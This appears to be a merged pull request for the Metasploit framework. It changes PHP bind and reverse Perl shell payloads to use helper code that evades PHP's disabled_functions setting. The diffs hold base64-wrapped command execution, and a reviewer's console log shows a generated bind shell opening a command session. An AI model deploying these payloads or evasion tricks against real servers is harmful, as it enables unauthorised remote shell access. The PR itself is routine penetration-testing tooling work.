### PR TITLE
Use php_preamble/php_system_block instead of `system` in payloads/singles/php/

### PR DESCRIPTION
**Pull request by jvoisin**
The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for PHP's `disabled_functions` configuration (eg. `system` might not be available but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style more in line with the other uses of `php_preamble`/`php_system_block`.

### CODE REVIEW

File: modules/payloads/singles/php/bind_perl.rb [hunk 1]
```diff
@@ -34,7 +34,13 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
```
Comment (Chocapikk) [inline modules/payloads/singles/php/bind_perl.rb:37]:
```suggestion
    vars = Rex::RandomIdentifier::Generator.new
    dis = "$#{vars[:dis]}"
```

File: modules/payloads/singles/php/bind_perl_ipv6.rb [hunk 2]
```diff
@@ -34,7 +34,13 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
```
Comment (Chocapikk) [inline modules/payloads/singles/php/bind_perl_ipv6.rb:37]:
```suggestion
    vars = Rex::RandomIdentifier::Generator.new
    dis = "$#{vars[:dis]}"
```

File: modules/payloads/singles/php/reverse_perl.rb [hunk 3]
```diff
@@ -35,11 +35,13 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    buf = "#{php_preamble}"
-    buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"
-    buf += "#{php_system_block({:cmd_varname=>"$c"})}"
-    return super + buf
-
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
```
Comment (Chocapikk) [inline modules/payloads/singles/php/reverse_perl.rb:38]:
```suggestion
    vars = Rex::RandomIdentifier::Generator.new
    dis = "$#{vars[:dis]}"
```

**Comment by jheysel-r7** [comment]
The changes here look good (I just landed the related WordPress specific PR) although the CI test failures are legit.

We have a number of unit tests that run for our different payloads that verify the `CachedSize` are as expected. When we update the `CachedSize` of a payload have to update the unit tests as well.  Apologies my first attempt to fix didn't work, I'll get back to you tomorrow on this.

**Comment by jheysel-r7** [comment]
I fixed the unit tests, tested the `php/bind_perl` payload and it's working as expected. Thanks for the enhancement! 

```
msf6 payload(php/bind_perl) > to_handler
[*] Payload Handler Started as Job 0

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > generate -o shell.php -f raw
[*] Writing 2049 bytes to shell.php...
msf6 payload(php/bind_perl) > [*] Command shell session 1 opened (172.16.199.158:33675 -> 172.16.199.158:4444) at 2024-09-26 16:22:53 -0800
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > sessions -i -1
[*] Starting interaction with 1...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
sysinfo
uname -a
Linux ubuntu 5.15.0-92-generic #102~20.04.1-Ubuntu SMP Mon Jan 15 13:09:14 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```

**Review by jheysel-r7 — APPROVED** [review]

**Pull request merged**